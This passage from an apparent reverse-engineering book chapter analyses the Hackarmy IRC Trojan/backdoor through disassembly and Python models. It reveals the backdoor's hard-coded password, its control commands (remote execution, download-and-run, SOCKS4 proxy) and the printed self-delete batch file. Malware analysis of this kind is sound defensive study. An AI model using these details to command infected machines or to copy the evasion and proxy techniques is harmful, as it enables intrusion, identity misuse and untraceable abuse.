00402E9A PUSH ZoneLock.004054A7 ; s2 = " :"
00402E9F MOV EAX,DWORD PTR SS:[EBP+8] ;
00402EA2 INC EAX ;
00402EA3 PUSH EAX ; s1
00402EA4 CALL <JMP.&CRTDLL.strstr> ; strstr
00402EA9 ADD ESP,8
00402EAC MOV EDX,EAX
00402EAE ADD EDX,2
00402EB1 MOV ESI,EDX
00402EB3 JNZ SHORT ZoneLock.00402EBC
00402EB5 XOR EAX,EAX
00402EB7 JMP ZoneLock.00403011
00402EBC MOVSX EAX,BYTE PTR DS:[ESI]
00402EBF MOVSX EDX,BYTE PTR DS:[4050C5]
00402EC6 CMP EAX,EDX
00402EC8 JE SHORT ZoneLock.00402ED1
00402ECA XOR EAX,EAX
After confirming that the command string is actually PRIVMSG, the program skips the colon character that denotes the beginning of the message (in the strstr call), and proceeds to compare the first character of the actual message with a character from 004050C5. When you look at that memory address in the debugger, you can see that it appears to contain a hard-coded exclamation mark (!) character. If the first character is not an exclamation mark, the program exits the function and goes back to wait for the next server transmission. So, it looks as if backdoor commands start with an exclamation mark. The next code sequence appears to perform another kind of check on your private messages. Let's take a look.
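Put together, the checks described so far amount to a small filter over incoming server lines. The following sketch is my own approximation: it splits the line on spaces to find the command token (the binary has already isolated that token by the time this code runs, and I'm not claiming it does so this way), then mirrors the strstr search for " :" and the test for the exclamation mark. The name `extract_command` and the sample lines are hypothetical.

```python
COMMAND_PREFIX = "!"  # the character stored at 004050C5


def extract_command(raw_line):
    """Return the text after '!' in a PRIVMSG, or None if the line is not a command."""
    parts = raw_line.split(" ")
    if len(parts) < 2 or parts[1] != "PRIVMSG":
        return None
    # Search for " :" starting one character into the line, then step past it.
    marker = raw_line.find(" :", 1)
    if marker == -1:
        return None
    message = raw_line[marker + 2:]
    if not message.startswith(COMMAND_PREFIX):
        return None
    return message[1:]


print(extract_command(":attacker!user@host PRIVMSG ##g## :!info"))
```

Anything that isn't a PRIVMSG, or whose message text doesn't begin with the prefix character, is ignored.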
00402EED XOR EDI,EDI
00402EEF LEA EAX,DWORD PTR SS:[EBP-60]
00402EF2 PUSH EAX ; s2
00402EF3 IMUL EAX,EDI,50 ;
00402EF6 LEA EAX,DWORD PTR DS:[EAX+4051C5] ;
00402EFD PUSH EAX ; s1
00402EFE CALL <JMP.&CRTDLL.strcmp> ; strcmp
00402F03 ADD ESP,8
00402F06 OR EAX,EAX
00402F08 JNZ SHORT ZoneLock.00402F0D
00402F0A XOR EBX,EBX
00402F0C INC EBX
00402F0D INC EDI
00402F0E CMP EDI,3
00402F11 JLE SHORT ZoneLock.00402EEF
The preceding sequence is important: It compares a string from [EBP-60], which is the nickname of the user who's sending the current private message (essentially the attacker) with a string from a global variable. It also looks as if this is an array of strings, each element being up to 0x50 (80 in decimal) characters long. While I was first stepping through this sequence, all of these four strings were empty. This made the code proceed to the code sequence that follows instead of calling into a longish function at 00403016 that would have been called if there was a match on one of the usernames. Let's look at what the function does next (when the usernames don't match).
00402F29 PUSH ZoneLock.004050BE ; <%s> = "tounge"
00402F2E PUSH ZoneLock.00405110 ; <%s> = "morris"
00402F33 PUSH ZoneLock.004054A1 ; format = "%s %s"
00402F38 LEA EAX,DWORD PTR SS:[EBP-260]
00402F3E PUSH EAX ; s
00402F3F CALL <JMP.&CRTDLL.sprintf>
00402F44 LEA EAX,DWORD PTR SS:[EBP-260]
00402F4A PUSH EAX ; s2
00402F4B PUSH ESI ; s1
00402F4C CALL <JMP.&CRTDLL.strcmp>
This is an interesting sequence. The first part uses sprintf to produce the string morris tounge, which is then checked against the current message being processed. If there is a mismatch, the function performs one more check on the current command string (even though it's been confirmed to be PRIVMSG), and returns. If the current command is "!morris tounge", the program stores the originating username in the currently available slot of the string array at 004051C5. That is, upon receiving this Morris message, the program stores the name of the user it's currently talking to in an array. This is the same array that was scanned for the attacker's name earlier. What does this tell you? It looks like the string !morris tounge is the secret password for the Backdoor program. It will only start processing commands from a user that has transmitted this particular message!
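The authentication scheme is essentially a tiny state machine: a fixed array of trusted nicknames, a password message that adds the sender to the array, and a check that gates command processing. Here is a minimal model of it. The class and method names are mine, the array is represented as a Python list of four strings instead of four 80-byte slots, and the handling of a full array is an assumption, since that path isn't shown above.

```python
MAX_MASTERS = 4  # the scan loop in the listing visits slots 0 through 3
PASSWORD_MESSAGE = "!" + "%s %s" % ("morris", "tounge")


class MasterList:
    """Illustrative model of the nickname array at 004051C5."""

    def __init__(self):
        self.slots = [""] * MAX_MASTERS

    def is_master(self, nick):
        return nick != "" and nick in self.slots

    def handle_message(self, nick, message):
        """Classify one private message as 'command', 'authenticated', or 'ignored'."""
        if self.is_master(nick):
            return "command"
        if message == PASSWORD_MESSAGE and "" in self.slots:
            # Assumed: the first empty slot receives the sender's nickname.
            self.slots[self.slots.index("")] = nick
            return "authenticated"
        return "ignored"


masters = MasterList()
print(masters.handle_message("attacker", "!info"))
print(masters.handle_message("attacker", "!morris tounge"))
print(masters.handle_message("attacker", "!info"))
```

Commands from an unknown nickname are dropped until that nickname has sent the password message; afterward the same command is accepted.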
One unusual thing about the preceding code snippet that generates and checks the password is that the sprintf call seems to be redundant. Why not just call strcmp with a pointer to the full morris tounge string? Why construct it at runtime if it's a predefined, hard-coded string? A quick search for other references to this address shows that it is static; there doesn't seem to be any other place in the code that modifies this sequence in any way. Therefore, the only reason I can think of is that the author of this program didn't want the string "morris tounge" to actually appear in the program in one piece. If you look at the code snippet, you'll see that each of the words comes from a different area in the program's data section. This is essentially a primitive antireversing scheme that's supposed to make it a bit more difficult to find the password string when searching through the program binary.
Now that you have the password, you can type it into your IRC program and try to establish a real communications channel with the backdoor. Obtaining a basic list of supported commands is going to be quite easy. I've already mentioned a routine at 00403016 that appears to process the supported commands. Disassembling this function to figure out the supported commands is an almost trivial task; one merely has to look for calls to string-comparison functions and examine the strings being compared. The function that does this is far too long to be included here, but let's take a look at a typical sequence that checks the incoming message.
0040308B PUSH ZoneLock.0040511B ; s2 = "?dontuseme"
00403090 LEA EAX,DWORD PTR SS:[EBP-200]
00403096 PUSH EAX ; s1
00403097 CALL <JMP.&CRTDLL.strcmp>
0040309C ADD ESP,8
0040309F OR EAX,EAX
004030A1 JNZ SHORT ZoneLock.004030B2
004030A3 CALL ZoneLock.00401AA0
004030A8 MOV EAX,3
004030AD JMP ZoneLock.00403640
004030B2 PUSH ZoneLock.00405126 ; s2 = "?quit"
004030B7 LEA EAX,DWORD PTR SS:[EBP-200]
004030BD PUSH EAX ; s1
004030BE CALL <JMP.&CRTDLL.strcmp>
004030C3 ADD ESP,8
004030C6 OR EAX,EAX
004030C8 JNZ SHORT ZoneLock.004030D4
004030CA MOV EAX,3
004030CF JMP ZoneLock.00403640
004030D4 PUSH ZoneLock.00405138 ; s2 = "threads"
004030D9 LEA EAX,DWORD PTR SS:[EBP-200]
004030DF PUSH EAX ; s1
004030E0 CALL <JMP.&CRTDLL.strcmp>
See my point? All three strings are compared against the string from [EBP-200]; that's the command string (not including the exclamation mark). There are quite a few string comparisons, and I won't go over the code that responds to each and every one of them. Instead, how about we try out a few of the more obvious ones and just see what happens? For instance, let's start with the !info command.
/JOIN ##g##
<attacker> !morris tounge
<attacker> !info
-iyljuhn- Windows 2000 [Service Pack 4]. uptime: 0d 18h 11m. cpu 1648MHz. online: 0d 0h 0m. Current user: eldade. IP:192.168.11.128 Hostname:eldad-vm-2ksrv. Processor x86 Family 6 Model 9 Stepping 8, GenuineIntel.
You start out by joining the ##g## channel and saying the password. You then send the "!info" command, to which the program responds with some general information regarding the infected host. This includes the exact version of the running operating system (in my case, this was the version of the guest operating system running under VMware, on which I installed the Trojan/backdoor), and other details such as estimated CPU speed and model number, IP address and system name, and so on.
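Finding commands such as "!info" by scanning the handler for string comparisons can be partly automated. The following Python sketch pulls the compared strings out of a disassembly listing in the format shown earlier (address, instruction, and an `s2 = "..."` comment). The listing is abridged from the sequence at 0040308B; the function name `compared_strings` and the assumption that every `s2` comment is followed by its strcmp call are mine, not something the tool guarantees.

```python
import re

# Abridged from the listing at 0040308B; only the lines relevant to strcmp are kept.
LISTING = """\
0040308B PUSH ZoneLock.0040511B ; s2 = "?dontuseme"
00403090 LEA EAX,DWORD PTR SS:[EBP-200]
00403096 PUSH EAX ; s1
00403097 CALL <JMP.&CRTDLL.strcmp>
004030B2 PUSH ZoneLock.00405126 ; s2 = "?quit"
004030B7 LEA EAX,DWORD PTR SS:[EBP-200]
004030BD PUSH EAX ; s1
004030BE CALL <JMP.&CRTDLL.strcmp>
004030D4 PUSH ZoneLock.00405138 ; s2 = "threads"
004030D9 LEA EAX,DWORD PTR SS:[EBP-200]
004030DF PUSH EAX ; s1
004030E0 CALL <JMP.&CRTDLL.strcmp>
"""

# Matches the string constant in a comment such as: ; s2 = "?quit"
S2_COMMENT = re.compile(r';\s*s2\s*=\s*"([^"]*)"')


def compared_strings(listing):
    """Return the constant strings that are passed to strcmp, in listing order."""
    found = []
    pending = None
    for line in listing.splitlines():
        match = S2_COMMENT.search(line)
        if match:
            pending = match.group(1)      # remember the most recent s2 constant
        elif "strcmp" in line and pending is not None:
            found.append(pending)         # the constant reached a strcmp call
            pending = None
    return found


for name in compared_strings(LISTING):
    print(name)
```

Run against the full handler, a scan like this would yield a candidate command list to try by hand; it says nothing about what each command does.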
There are plenty of other, far more interesting commands. For example, take a look at the "!webfind64" and "!execute" commands. "!execute" launches an executable from the infected host's local drives. "!webfind64" downloads a file from any remote server into a local directory and launches it if needed. Together, these two commands give an attacker full-blown access to the infected system, which can then be exploited in countless ways.
There is one other significant command in the backdoor program that I haven't discussed yet: "!socks4". This command establishes a thread that waits for connections that use the SOCKS4 protocol. SOCKS4 is a well-known proxy communications protocol that can be used for indirectly accessing a network. Using SOCKS4, it is possible to route all traffic (for example, outgoing Internet traffic) through a single server.
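To make the protocol concrete, here is a minimal Python sketch of the SOCKS4 wire format: a client request carries a version byte (4), a command byte (1 for CONNECT), a destination port, a destination IPv4 address, and a null-terminated user ID, and the server answers with an 8-byte reply whose second byte is 90 when the request is granted. The function names are hypothetical, and the sketch says nothing about how the backdoor itself implements its proxy threads.

```python
import socket
import struct


def parse_socks4_request(data):
    """Decode a SOCKS4 request: VN, CD, DSTPORT, DSTIP, then USERID ending in NUL."""
    if len(data) < 9:
        raise ValueError("request too short")
    version, command, port = struct.unpack("!BBH", data[:4])
    if version != 4:
        raise ValueError("not a SOCKS4 request")
    address = socket.inet_ntoa(data[4:8])
    end = data.index(b"\x00", 8)          # raises ValueError if the NUL is missing
    user_id = data[8:end].decode("ascii", errors="replace")
    return {"command": command, "port": port, "address": address, "user_id": user_id}


def build_socks4_reply(granted, port=0, address="0.0.0.0"):
    """Build the 8-byte reply: VN is 0, CD is 90 (granted) or 91 (rejected)."""
    code = 90 if granted else 91
    return struct.pack("!BBH", 0, code, port) + socket.inet_aton(address)


# Example: a CONNECT request for port 80 on 192.168.11.128.
request = struct.pack("!BBH", 4, 1, 80) + socket.inet_aton("192.168.11.128") + b"user\x00"
print(parse_socks4_request(request))
print(build_socks4_reply(True).hex())
```

Because the request names only a destination address and port, the destination server sees the proxy's address rather than the client's.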
The backdoor supports multiple SOCKS4 threads that listen to any traffic on attacker-supplied port numbers. What does this all mean? It means that if the infected system has any open ports on the Internet, it is possible to install a SOCKS4 server on one of those ports, and use that system to indirectly connect to the Internet. For attackers this can be heaven, because it allows them to anonymously connect to servers on the Internet (actually, it's not anonymous—it uses the legitimate system owner's identity, so it is essentially a type of identity theft). Such anonymous connections can be used for any purpose: Web browsing, e-mail, and so on. The ability to connect to other servers anonymously without exposing one's true identity creates endless criminal opportunities—it is going to be extremely difficult to trace back the actual system from which the traffic is originating. This is especially true if each individual proxy is only used for a brief period of time and if each proxy is cleaned up properly once it is decommissioned.
Speaking of cleaning up, this program supports a self-destruct command called "!?dontuseme", which uninstalls the program from the registry and deletes the executable. You can probably guess that this is not an entirely trivial task, because an executable program file cannot be deleted while the program is running. In order to work around this problem, the program must generate a "self-destruct" batch file, which deletes the program's executable after the main program exits. This is done in a little function at 00401AA0, which generates the following batch file, called "rm.bat". The program runs this batch file and quits. Let's take a quick look at this batch file.
@echo off
:start
if not exist "C:\WINNT\SYSTEM32\ZoneLockup.exe" goto done
del "C:\WINNT\SYSTEM32\ZoneLockup.exe"
goto start
:done
del rm.bat
This batch file loops through code that attempts to delete the main program executable. The loop is only terminated once the executable is actually gone. That's because the batch file is going to start running while the ZoneLockup.exe executable is still running. The batch file must wait until ZoneLockup.exe is no longer running so that it can be deleted.
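The control flow of that loop can be modeled without touching any files. The Python sketch below is a simulation only: the function name `simulate_self_delete` and the idea of counting how many passes happen while the process is still running are illustrative assumptions, not something taken from the program.

```python
def simulate_self_delete(passes_while_running):
    """Model the rm.bat loop: del fails while the executable is still running.

    passes_while_running is the (assumed) number of loop passes that occur
    before the main program has fully exited. Returns the total number of
    delete attempts made before the file is gone.
    """
    file_exists = True
    attempts = 0
    while file_exists:                              # ":start" / "if not exist ... goto done"
        attempts += 1                               # "del ..." is attempted on every pass
        still_running = attempts <= passes_while_running
        if not still_running:
            file_exists = False                     # del succeeds once the file is unlocked
        # otherwise del fails silently and "goto start" retries
    return attempts


print(simulate_self_delete(0))
print(simulate_self_delete(3))
```

The loop always makes one more attempt than the number of passes during which the executable was locked, which is exactly the busy-wait behavior the batch file relies on.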
Having gathered all of this information, I realized that it would be a waste to not properly summarize it. This is an interesting program that reveals much about how modern-day malware works. The following table provides a listing of the supported commands I was able to find in the program along with their descriptions.
Table 8.1. List of supported commands in the Hackarmy Trojan/Backdoor program.
| COMMAND | DESCRIPTION | ARGUMENTS |
|---|---|---|
| !?dontuseme | Instructs the program to self-destruct by removing its | |
| !socks4 | Initializes a SOCKS4 server thread on the specified port. This essentially turns the infected system into a proxy server. | Port number to open. |
| | Lists the currently active server threads. | |
| !info | Displays some generic information regarding the infected host, including its name, IP address, CPU model and speed, currently logged on username, and so on. | |
| | Closes the backdoor process without uninstalling the program. It will be started again the next time the system boots. | |
| | Causes the program to disconnect from the IRC server and wait for the specified number of minutes before attempting to reconnect. | Number of minutes to wait before attempting reconnection. |
| !execute | Executes a local binary. The program is launched in a hidden mode to keep the end user out of the loop... | Full path to executable file. |
| | Deletes a file from the infected host. The program responds with a message notifying the attacker whether or not the operation was successful. | Full path to file being deleted. |
| !webfind64 | Instructs the infected host to download a file from a remote server (using a specified protocol such as | URL of file being downloaded and local file name that will receive the downloaded file. |
| | The strings for these two commands appear in the executable, and there is a function (at | |
Malicious programs can be treacherous and complicated. They will do their best to be invisible and seem as innocent as possible. Educating end users on how these programs work and what to watch out for is critical, but it's not enough. Developers of applications and operating systems must constantly improve the way these programs handle untrusted code and convincingly convey to the users the fact that they simply shouldn't let an unknown program run on their system unless there's an excellent reason to do so.
In this chapter, you have learned a bit about malicious programs, how they work, and how they hide themselves from antivirus scanners. You also dissected a very typical real-world malicious program and analyzed its behavior, to gain a general idea of how these programs operate and what type of damage they inflict on infected systems.
Granted, most people wouldn't ever need to actually reverse engineer a malicious program. The developers of antivirus and other security software do an excellent job, and all that is necessary is to install the right security products and properly configure systems and networks for maximum security. Still, reversing malware can be seen as an excellent exercise in reverse engineering and as a solid introduction to malicious software.